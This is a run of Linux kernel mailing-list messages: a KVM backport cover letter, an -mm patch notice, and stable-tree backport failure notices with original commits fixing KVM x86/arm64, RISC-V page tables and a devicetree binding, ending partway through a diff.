only true dependencies is that the DEBUGCTL.RTM_DEBUG patch needs to land
before "Check vmcs12->guest_ia32_debugctl on nested VM-Enter".
Many of the patches to get to the last patch (the DEBUGCTLMSR_FREEZE_IN_SMM
fix) are dependencies that arguably shouldn't be backported to LTS kernels.
I opted to do the backports because none of the patches are scary (if it was
1-3 dependency patches instead of 8 I wouldn't hesitate), and there's a decent
chance they'll be dependencies for future fixes.
[1] https://lore.kernel.org/all/20250813184918.2071296-1-sashal@kernel.org
[2] https://lore.kernel.org/all/20250814132434.2096873-1-sashal@kernel.org
Chao Gao (1):
KVM: nVMX: Defer SVI update to vmcs01 on EOI when L2 is active w/o VID
Maxim Levitsky (3):
KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested VM-Enter
KVM: VMX: Wrap all accesses to IA32_DEBUGCTL with getter/setter APIs
KVM: VMX: Preserve host's DEBUGCTLMSR_FREEZE_IN_SMM while running the
guest
Sean Christopherson (17):
KVM: SVM: Set RFLAGS.IF=1 in C code, to get VMRUN out of the STI
shadow
KVM: x86: Re-split x2APIC ICR into ICR+ICR2 for AMD (x2AVIC)
KVM: x86: Plumb in the vCPU to kvm_x86_ops.hwapic_isr_update()
KVM: x86: Take irqfds.lock when adding/deleting IRQ bypass producer
KVM: x86: Snapshot the host's DEBUGCTL in common x86
KVM: x86: Snapshot the host's DEBUGCTL after disabling IRQs
KVM: x86/pmu: Gate all "unimplemented MSR" prints on
report_ignored_msrs
KVM: x86: Plumb "force_immediate_exit" into kvm_entry() tracepoint
KVM: VMX: Re-enter guest in fastpath for "spurious" preemption timer
exits
KVM: VMX: Handle forced exit due to preemption timer in fastpath
KVM: x86: Move handling of is_guest_mode() into fastpath exit handlers
KVM: VMX: Handle KVM-induced preemption timer exits in fastpath for L2
KVM: x86: Fully defer to vendor code to decide how to force immediate
exit
KVM: x86: Convert vcpu_run()'s immediate exit param into a generic
bitmap
KVM: x86: Drop kvm_x86_ops.set_dr6() in favor of a new KVM_RUN flag
KVM: VMX: Allow guest to set DEBUGCTL.RTM_DEBUG if RTM is supported
KVM: VMX: Extract checking of guest's DEBUGCTL into helper
arch/x86/include/asm/kvm-x86-ops.h | 2 -
arch/x86/include/asm/kvm_host.h | 24 +++--
arch/x86/include/asm/msr-index.h | 1 +
arch/x86/kvm/hyperv.c | 10 +-
arch/x86/kvm/lapic.c | 61 ++++++++---
arch/x86/kvm/lapic.h | 1 +
arch/x86/kvm/svm/svm.c | 49 ++++++---
arch/x86/kvm/svm/vmenter.S | 9 +-
arch/x86/kvm/trace.h | 9 +-
arch/x86/kvm/vmx/nested.c | 26 ++++-
arch/x86/kvm/vmx/pmu_intel.c | 8 +-
arch/x86/kvm/vmx/vmx.c | 168 ++++++++++++++++++-----------
arch/x86/kvm/vmx/vmx.h | 31 +++++-
arch/x86/kvm/x86.c | 65 ++++++-----
arch/x86/kvm/x86.h | 12 +++
15 files changed, 322 insertions(+), 154 deletions(-)
base-commit: 3594f306da129190de25938b823f353ef7f9e322
--
2.51.0.rc1.163.g2494970778-goog
The patch titled
Subject: riscv: use an atomic xchg in pudp_huge_get_and_clear()
has been added to the -mm mm-new branch. Its filename is
riscv-use-an-atomic-xchg-in-pudp_huge_get_and_clear.patch
This patch will shortly appear at
https://git.kernel.org/pub/scm/linux/kernel/git/akpm/25-new.git/tree/patche…
This patch will later appear in the mm-new branch at
git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
Note, mm-new is a provisional staging ground for work-in-progress
patches, and acceptance into mm-new is a notification for others take
notice and to finish up reviews. Please do not hesitate to respond to
review feedback and post updated versions to replace or incrementally
fixup patches in mm-new.
Before you just go and hit "reply", please:
a) Consider who else should be cc'ed
b) Prefer to cc a suitable mailing list as well
c) Ideally: find the original patch on the mailing list and do a
reply-to-all to that, adding suitable additional cc's
*** Remember to use Documentation/process/submit-checklist.rst when testing your code ***
The -mm tree is included into linux-next via the mm-everything
branch at git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
and is updated there every 2-3 working days
------------------------------------------------------
From: Alexandre Ghiti <alexghiti(a)rivosinc.com>
Subject: riscv: use an atomic xchg in pudp_huge_get_and_clear()
Date: Thu, 14 Aug 2025 12:06:14 +0000
Make sure we return the right pud value and not a value that could have
been overwritten in between by a different core.
Link: https://lkml.kernel.org/r/20250814-dev-alex-thp_pud_xchg-v1-1-b4704dfae206@…
Fixes: c3cc2a4a3a23 ("riscv: Add support for PUD THP")
Signed-off-by: Alexandre Ghiti <alexghiti(a)rivosinc.com>
Cc: Andrew Donnellan <ajd(a)linux.ibm.com>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
arch/riscv/include/asm/pgtable.h | 11 +++++++++++
1 file changed, 11 insertions(+)
--- a/arch/riscv/include/asm/pgtable.h~riscv-use-an-atomic-xchg-in-pudp_huge_get_and_clear
+++ a/arch/riscv/include/asm/pgtable.h
@@ -942,6 +942,17 @@ static inline int pudp_test_and_clear_yo
return ptep_test_and_clear_young(vma, address, (pte_t *)pudp);
}
+#define __HAVE_ARCH_PUDP_HUGE_GET_AND_CLEAR
+static inline pud_t pudp_huge_get_and_clear(struct mm_struct *mm,
+ unsigned long address, pud_t *pudp)
+{
+ pud_t pud = __pud(atomic_long_xchg((atomic_long_t *)pudp, 0));
+
+ page_table_check_pud_clear(mm, pud);
+
+ return pud;
+}
+
static inline int pud_young(pud_t pud)
{
return pte_young(pud_pte(pud));
_
Patches currently in -mm which might be from alexghiti(a)rivosinc.com are
selftests-damon-fix-damon-selftests-by-installing-_commonsh.patch
riscv-use-an-atomic-xchg-in-pudp_huge_get_and_clear.patch
The patch below does not apply to the 6.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.15.y
git checkout FETCH_HEAD
git cherry-pick -x c6e35dff58d348c1a9489e9b3b62b3721e62631d
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081248-omission-talisman-0619@gregkh' --subject-prefix 'PATCH 6.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From c6e35dff58d348c1a9489e9b3b62b3721e62631d Mon Sep 17 00:00:00 2001
From: Marc Zyngier <maz(a)kernel.org>
Date: Sun, 20 Jul 2025 11:22:29 +0100
Subject: [PATCH] KVM: arm64: Check for SYSREGS_ON_CPU before accessing the CPU
state
Mark Brown reports that since we commit to making exceptions
visible without the vcpu being loaded, the external abort selftest
fails.
Upon investigation, it turns out that the code that makes registers
affected by an exception visible to the guest is completely broken
on VHE, as we don't check whether the system registers are loaded
on the CPU at this point. We managed to get away with this so far,
but that's obviously as bad as it gets,
Add the required checksm and document the absolute need to check
for the SYSREGS_ON_CPU flag before calling into any of the
__vcpu_write_sys_reg_to_cpu()__vcpu_read_sys_reg_from_cpu() helpers.
Reported-by: Mark Brown <broonie(a)kernel.org>
Signed-off-by: Marc Zyngier <maz(a)kernel.org>
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/r/18535df8-e647-4643-af9a-bb780af03a70@sirena.org.uk
Link: https://lore.kernel.org/r/20250720102229.179114-1-maz@kernel.org
Signed-off-by: Oliver Upton <oliver.upton(a)linux.dev>
diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
index e54d29feb469..d373d555a69b 100644
--- a/arch/arm64/include/asm/kvm_host.h
+++ b/arch/arm64/include/asm/kvm_host.h
@@ -1169,6 +1169,8 @@ static inline bool __vcpu_read_sys_reg_from_cpu(int reg, u64 *val)
* System registers listed in the switch are not saved on every
* exit from the guest but are only saved on vcpu_put.
*
+ * SYSREGS_ON_CPU *MUST* be checked before using this helper.
+ *
* Note that MPIDR_EL1 for the guest is set by KVM via VMPIDR_EL2 but
* should never be listed below, because the guest cannot modify its
* own MPIDR_EL1 and MPIDR_EL1 is accessed for VCPU A from VCPU B's
@@ -1221,6 +1223,8 @@ static inline bool __vcpu_write_sys_reg_to_cpu(u64 val, int reg)
* System registers listed in the switch are not restored on every
* entry to the guest but are only restored on vcpu_load.
*
+ * SYSREGS_ON_CPU *MUST* be checked before using this helper.
+ *
* Note that MPIDR_EL1 for the guest is set by KVM via VMPIDR_EL2 but
* should never be listed below, because the MPIDR should only be set
* once, before running the VCPU, and never changed later.
diff --git a/arch/arm64/kvm/hyp/exception.c b/arch/arm64/kvm/hyp/exception.c
index 7dafd10e52e8..95d186e0bf54 100644
--- a/arch/arm64/kvm/hyp/exception.c
+++ b/arch/arm64/kvm/hyp/exception.c
@@ -26,7 +26,8 @@ static inline u64 __vcpu_read_sys_reg(const struct kvm_vcpu *vcpu, int reg)
if (unlikely(vcpu_has_nv(vcpu)))
return vcpu_read_sys_reg(vcpu, reg);
- else if (__vcpu_read_sys_reg_from_cpu(reg, &val))
+ else if (vcpu_get_flag(vcpu, SYSREGS_ON_CPU) &&
+ __vcpu_read_sys_reg_from_cpu(reg, &val))
return val;
return __vcpu_sys_reg(vcpu, reg);
@@ -36,7 +37,8 @@ static inline void __vcpu_write_sys_reg(struct kvm_vcpu *vcpu, u64 val, int reg)
{
if (unlikely(vcpu_has_nv(vcpu)))
vcpu_write_sys_reg(vcpu, val, reg);
- else if (!__vcpu_write_sys_reg_to_cpu(val, reg))
+ else if (!vcpu_get_flag(vcpu, SYSREGS_ON_CPU) ||
+ !__vcpu_write_sys_reg_to_cpu(val, reg))
__vcpu_assign_sys_reg(vcpu, reg, val);
}
Lists should have fixed constraints, because binding must be specific in
respect to hardware, thus add missing constraints to number of clocks.
Cc: <stable(a)vger.kernel.org>
Fixes: 88a499cd70d4 ("dt-bindings: Add support for the Broadcom UART driver")
Signed-off-by: Krzysztof Kozlowski <krzysztof.kozlowski(a)linaro.org>
---
Greg, patch for serial tree.
---
Documentation/devicetree/bindings/serial/brcm,bcm7271-uart.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Documentation/devicetree/bindings/serial/brcm,bcm7271-uart.yaml b/Documentation/devicetree/bindings/serial/brcm,bcm7271-uart.yaml
index 89c462653e2d..8cc848ae11cb 100644
--- a/Documentation/devicetree/bindings/serial/brcm,bcm7271-uart.yaml
+++ b/Documentation/devicetree/bindings/serial/brcm,bcm7271-uart.yaml
@@ -41,7 +41,7 @@ properties:
- const: dma_intr2
clocks:
- minItems: 1
+ maxItems: 1
clock-names:
const: sw_baud
--
2.48.1
The patch below does not apply to the 5.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.15.y
git checkout FETCH_HEAD
git cherry-pick -x a0ee1d5faff135e28810f29e0f06328c66f89852
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025062039-anger-volumes-9d75@gregkh' --subject-prefix 'PATCH 5.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From a0ee1d5faff135e28810f29e0f06328c66f89852 Mon Sep 17 00:00:00 2001
From: Chao Gao <chao.gao(a)intel.com>
Date: Mon, 24 Mar 2025 22:08:48 +0800
Subject: [PATCH] KVM: VMX: Flush shadow VMCS on emergency reboot
Ensure the shadow VMCS cache is evicted during an emergency reboot to
prevent potential memory corruption if the cache is evicted after reboot.
This issue was identified through code inspection, as __loaded_vmcs_clear()
flushes both the normal VMCS and the shadow VMCS.
Avoid checking the "launched" state during an emergency reboot, unlike the
behavior in __loaded_vmcs_clear(). This is important because reboot NMIs
can interfere with operations like copy_shadow_to_vmcs12(), where shadow
VMCSes are loaded directly using VMPTRLD. In such cases, if NMIs occur
right after the VMCS load, the shadow VMCSes will be active but the
"launched" state may not be set.
Fixes: 16f5b9034b69 ("KVM: nVMX: Copy processor-specific shadow-vmcs to VMCS12")
Cc: stable(a)vger.kernel.org
Signed-off-by: Chao Gao <chao.gao(a)intel.com>
Reviewed-by: Kai Huang <kai.huang(a)intel.com>
Link: https://lore.kernel.org/r/20250324140849.2099723-1-chao.gao@intel.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index ef2d7208dd20..848c4963bdb8 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -770,8 +770,11 @@ void vmx_emergency_disable_virtualization_cpu(void)
return;
list_for_each_entry(v, &per_cpu(loaded_vmcss_on_cpu, cpu),
- loaded_vmcss_on_cpu_link)
+ loaded_vmcss_on_cpu_link) {
vmcs_clear(v->vmcs);
+ if (v->shadow_vmcs)
+ vmcs_clear(v->shadow_vmcs);
+ }
kvm_cpu_vmxoff();
}
The patch below does not apply to the 6.1-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.1.y
git checkout FETCH_HEAD
git cherry-pick -x 17ec2f965344ee3fd6620bef7ef68792f4ac3af0
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081208-commerce-sports-ea01@gregkh' --subject-prefix 'PATCH 6.1.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 17ec2f965344ee3fd6620bef7ef68792f4ac3af0 Mon Sep 17 00:00:00 2001
From: Sean Christopherson <seanjc(a)google.com>
Date: Tue, 10 Jun 2025 16:20:06 -0700
Subject: [PATCH] KVM: VMX: Allow guest to set DEBUGCTL.RTM_DEBUG if RTM is
supported
Let the guest set DEBUGCTL.RTM_DEBUG if RTM is supported according to the
guest CPUID model, as debug support is supposed to be available if RTM is
supported, and there are no known downsides to letting the guest debug RTM
aborts.
Note, there are no known bug reports related to RTM_DEBUG, the primary
motivation is to reduce the probability of breaking existing guests when a
future change adds a missing consistency check on vmcs12.GUEST_DEBUGCTL
(KVM currently lets L2 run with whatever hardware supports; whoops).
Note #2, KVM already emulates DR6.RTM, and doesn't restrict access to
DR7.RTM.
Fixes: 83c529151ab0 ("KVM: x86: expose Intel cpu new features (HLE, RTM) to guest")
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/r/20250610232010.162191-5-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
index b7dded3c8113..fa878b136eba 100644
--- a/arch/x86/include/asm/msr-index.h
+++ b/arch/x86/include/asm/msr-index.h
@@ -419,6 +419,7 @@
#define DEBUGCTLMSR_FREEZE_PERFMON_ON_PMI (1UL << 12)
#define DEBUGCTLMSR_FREEZE_IN_SMM_BIT 14
#define DEBUGCTLMSR_FREEZE_IN_SMM (1UL << DEBUGCTLMSR_FREEZE_IN_SMM_BIT)
+#define DEBUGCTLMSR_RTM_DEBUG BIT(15)
#define MSR_PEBS_FRONTEND 0x000003f7
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4ee6cc796855..311f6fa53b67 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2186,6 +2186,10 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
(host_initiated || intel_pmu_lbr_is_enabled(vcpu)))
debugctl |= DEBUGCTLMSR_LBR | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI;
+ if (boot_cpu_has(X86_FEATURE_RTM) &&
+ (host_initiated || guest_cpu_cap_has(vcpu, X86_FEATURE_RTM)))
+ debugctl |= DEBUGCTLMSR_RTM_DEBUG;
+
return debugctl;
}
The patch below does not apply to the 6.1-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.1.y
git checkout FETCH_HEAD
git cherry-pick -x a0ee1d5faff135e28810f29e0f06328c66f89852
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025062034-chastise-wrecking-9a12@gregkh' --subject-prefix 'PATCH 6.1.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From a0ee1d5faff135e28810f29e0f06328c66f89852 Mon Sep 17 00:00:00 2001
From: Chao Gao <chao.gao(a)intel.com>
Date: Mon, 24 Mar 2025 22:08:48 +0800
Subject: [PATCH] KVM: VMX: Flush shadow VMCS on emergency reboot
Ensure the shadow VMCS cache is evicted during an emergency reboot to
prevent potential memory corruption if the cache is evicted after reboot.
This issue was identified through code inspection, as __loaded_vmcs_clear()
flushes both the normal VMCS and the shadow VMCS.
Avoid checking the "launched" state during an emergency reboot, unlike the
behavior in __loaded_vmcs_clear(). This is important because reboot NMIs
can interfere with operations like copy_shadow_to_vmcs12(), where shadow
VMCSes are loaded directly using VMPTRLD. In such cases, if NMIs occur
right after the VMCS load, the shadow VMCSes will be active but the
"launched" state may not be set.
Fixes: 16f5b9034b69 ("KVM: nVMX: Copy processor-specific shadow-vmcs to VMCS12")
Cc: stable(a)vger.kernel.org
Signed-off-by: Chao Gao <chao.gao(a)intel.com>
Reviewed-by: Kai Huang <kai.huang(a)intel.com>
Link: https://lore.kernel.org/r/20250324140849.2099723-1-chao.gao@intel.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index ef2d7208dd20..848c4963bdb8 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -770,8 +770,11 @@ void vmx_emergency_disable_virtualization_cpu(void)
return;
list_for_each_entry(v, &per_cpu(loaded_vmcss_on_cpu, cpu),
- loaded_vmcss_on_cpu_link)
+ loaded_vmcss_on_cpu_link) {
vmcs_clear(v->vmcs);
+ if (v->shadow_vmcs)
+ vmcs_clear(v->shadow_vmcs);
+ }
kvm_cpu_vmxoff();
}
The patch below does not apply to the 6.6-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.6.y
git checkout FETCH_HEAD
git cherry-pick -x 17ec2f965344ee3fd6620bef7ef68792f4ac3af0
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081209-porcupine-shut-1d95@gregkh' --subject-prefix 'PATCH 6.6.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 17ec2f965344ee3fd6620bef7ef68792f4ac3af0 Mon Sep 17 00:00:00 2001
From: Sean Christopherson <seanjc(a)google.com>
Date: Tue, 10 Jun 2025 16:20:06 -0700
Subject: [PATCH] KVM: VMX: Allow guest to set DEBUGCTL.RTM_DEBUG if RTM is
supported
Let the guest set DEBUGCTL.RTM_DEBUG if RTM is supported according to the
guest CPUID model, as debug support is supposed to be available if RTM is
supported, and there are no known downsides to letting the guest debug RTM
aborts.
Note, there are no known bug reports related to RTM_DEBUG, the primary
motivation is to reduce the probability of breaking existing guests when a
future change adds a missing consistency check on vmcs12.GUEST_DEBUGCTL
(KVM currently lets L2 run with whatever hardware supports; whoops).
Note #2, KVM already emulates DR6.RTM, and doesn't restrict access to
DR7.RTM.
Fixes: 83c529151ab0 ("KVM: x86: expose Intel cpu new features (HLE, RTM) to guest")
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/r/20250610232010.162191-5-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
index b7dded3c8113..fa878b136eba 100644
--- a/arch/x86/include/asm/msr-index.h
+++ b/arch/x86/include/asm/msr-index.h
@@ -419,6 +419,7 @@
#define DEBUGCTLMSR_FREEZE_PERFMON_ON_PMI (1UL << 12)
#define DEBUGCTLMSR_FREEZE_IN_SMM_BIT 14
#define DEBUGCTLMSR_FREEZE_IN_SMM (1UL << DEBUGCTLMSR_FREEZE_IN_SMM_BIT)
+#define DEBUGCTLMSR_RTM_DEBUG BIT(15)
#define MSR_PEBS_FRONTEND 0x000003f7
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4ee6cc796855..311f6fa53b67 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2186,6 +2186,10 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
(host_initiated || intel_pmu_lbr_is_enabled(vcpu)))
debugctl |= DEBUGCTLMSR_LBR | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI;
+ if (boot_cpu_has(X86_FEATURE_RTM) &&
+ (host_initiated || guest_cpu_cap_has(vcpu, X86_FEATURE_RTM)))
+ debugctl |= DEBUGCTLMSR_RTM_DEBUG;
+
return debugctl;
}
The patch below does not apply to the 6.16-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.16.y
git checkout FETCH_HEAD
git cherry-pick -x 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081231-vengeful-creasing-d789@gregkh' --subject-prefix 'PATCH 6.16.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:10 -0700
Subject: [PATCH] KVM: VMX: Preserve host's DEBUGCTLMSR_FREEZE_IN_SMM while
running the guest
Set/clear DEBUGCTLMSR_FREEZE_IN_SMM in GUEST_IA32_DEBUGCTL based on the
host's pre-VM-Enter value, i.e. preserve the host's FREEZE_IN_SMM setting
while running the guest. When running with the "default treatment of SMIs"
in effect (the only mode KVM supports), SMIs do not generate a VM-Exit that
is visible to host (non-SMM) software, and instead transitions directly
from VMX non-root to SMM. And critically, DEBUGCTL isn't context switched
by hardware on SMI or RSM, i.e. SMM will run with whatever value was
resident in hardware at the time of the SMI.
Failure to preserve FREEZE_IN_SMM results in the PMU unexpectedly counting
events while the CPU is executing in SMM, which can pollute profiling and
potentially leak information into the guest.
Check for changes in FREEZE_IN_SMM prior to every entry into KVM's inner
run loop, as the bit can be toggled in IRQ context via IPI callback (SMP
function call), by way of /sys/devices/cpu/freeze_on_smi.
Add a field in kvm_x86_ops to communicate which DEBUGCTL bits need to be
preserved, as FREEZE_IN_SMM is only supported and defined for Intel CPUs,
i.e. explicitly checking FREEZE_IN_SMM in common x86 is at best weird, and
at worst could lead to undesirable behavior in the future if AMD CPUs ever
happened to pick up a collision with the bit.
Exempt TDX vCPUs, i.e. protected guests, from the check, as the TDX Module
owns and controls GUEST_IA32_DEBUGCTL.
WARN in SVM if KVM_RUN_LOAD_DEBUGCTL is set, mostly to document that the
lack of handling isn't a KVM bug (TDX already WARNs on any run_flag).
Lastly, explicitly reload GUEST_IA32_DEBUGCTL on a VM-Fail that is missed
by KVM but detected by hardware, i.e. in nested_vmx_restore_host_state().
Doing so avoids the need to track host_debugctl on a per-VMCS basis, as
GUEST_IA32_DEBUGCTL is unconditionally written by prepare_vmcs02() and
load_vmcs12_host_state(). For the VM-Fail case, even though KVM won't
have actually entered the guest, vcpu_enter_guest() will have run with
vmcs02 active and thus could result in vmcs01 being run with a stale value.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-9-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
index 4f7ee2dbf10e..5e0415a8ee3f 100644
--- a/arch/x86/include/asm/kvm_host.h
+++ b/arch/x86/include/asm/kvm_host.h
@@ -1677,6 +1677,7 @@ static inline u16 kvm_lapic_irq_dest_mode(bool dest_mode_logical)
enum kvm_x86_run_flags {
KVM_RUN_FORCE_IMMEDIATE_EXIT = BIT(0),
KVM_RUN_LOAD_GUEST_DR6 = BIT(1),
+ KVM_RUN_LOAD_DEBUGCTL = BIT(2),
};
struct kvm_x86_ops {
@@ -1707,6 +1708,12 @@ struct kvm_x86_ops {
void (*vcpu_load)(struct kvm_vcpu *vcpu, int cpu);
void (*vcpu_put)(struct kvm_vcpu *vcpu);
+ /*
+ * Mask of DEBUGCTL bits that are owned by the host, i.e. that need to
+ * match the host's value even while the guest is active.
+ */
+ const u64 HOST_OWNED_DEBUGCTL;
+
void (*update_exception_bitmap)(struct kvm_vcpu *vcpu);
int (*get_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
int (*set_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
diff --git a/arch/x86/kvm/vmx/main.c b/arch/x86/kvm/vmx/main.c
index c85cbce6d2f6..4a6d4460f947 100644
--- a/arch/x86/kvm/vmx/main.c
+++ b/arch/x86/kvm/vmx/main.c
@@ -915,6 +915,8 @@ struct kvm_x86_ops vt_x86_ops __initdata = {
.vcpu_load = vt_op(vcpu_load),
.vcpu_put = vt_op(vcpu_put),
+ .HOST_OWNED_DEBUGCTL = DEBUGCTLMSR_FREEZE_IN_SMM,
+
.update_exception_bitmap = vt_op(update_exception_bitmap),
.get_feature_msr = vmx_get_feature_msr,
.get_msr = vt_op(get_msr),
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index ef20184b8b11..c69df3aba8d1 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -4861,6 +4861,9 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
WARN_ON(kvm_set_dr(vcpu, 7, vmcs_readl(GUEST_DR7)));
}
+ /* Reload DEBUGCTL to ensure vmcs01 has a fresh FREEZE_IN_SMM value. */
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Note that calling vmx_set_{efer,cr0,cr4} is important as they
* handle a variety of side effects to KVM's software model.
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index a77d325fe78b..0db1bd383302 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -7377,6 +7377,9 @@ fastpath_t vmx_vcpu_run(struct kvm_vcpu *vcpu, u64 run_flags)
if (run_flags & KVM_RUN_LOAD_GUEST_DR6)
set_debugreg(vcpu->arch.dr6, 6);
+ if (run_flags & KVM_RUN_LOAD_DEBUGCTL)
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Refresh vmcs.HOST_CR3 if necessary. This must be done immediately
* prior to VM-Enter, as the kernel may load a new ASID (PCID) any time
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index c20a4185d10a..076af78af151 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -419,12 +419,25 @@ bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
static inline void vmx_guest_debugctl_write(struct kvm_vcpu *vcpu, u64 val)
{
+ WARN_ON_ONCE(val & DEBUGCTLMSR_FREEZE_IN_SMM);
+
+ val |= vcpu->arch.host_debugctl & DEBUGCTLMSR_FREEZE_IN_SMM;
vmcs_write64(GUEST_IA32_DEBUGCTL, val);
}
static inline u64 vmx_guest_debugctl_read(void)
{
- return vmcs_read64(GUEST_IA32_DEBUGCTL);
+ return vmcs_read64(GUEST_IA32_DEBUGCTL) & ~DEBUGCTLMSR_FREEZE_IN_SMM;
+}
+
+static inline void vmx_reload_guest_debugctl(struct kvm_vcpu *vcpu)
+{
+ u64 val = vmcs_read64(GUEST_IA32_DEBUGCTL);
+
+ if (!((val ^ vcpu->arch.host_debugctl) & DEBUGCTLMSR_FREEZE_IN_SMM))
+ return;
+
+ vmx_guest_debugctl_write(vcpu, val & ~DEBUGCTLMSR_FREEZE_IN_SMM);
}
/*
diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
index 7fe3549bbd93..179c2c550c8d 100644
--- a/arch/x86/kvm/x86.c
+++ b/arch/x86/kvm/x86.c
@@ -10779,7 +10779,7 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
dm_request_for_irq_injection(vcpu) &&
kvm_cpu_accept_dm_intr(vcpu);
fastpath_t exit_fastpath;
- u64 run_flags;
+ u64 run_flags, debug_ctl;
bool req_immediate_exit = false;
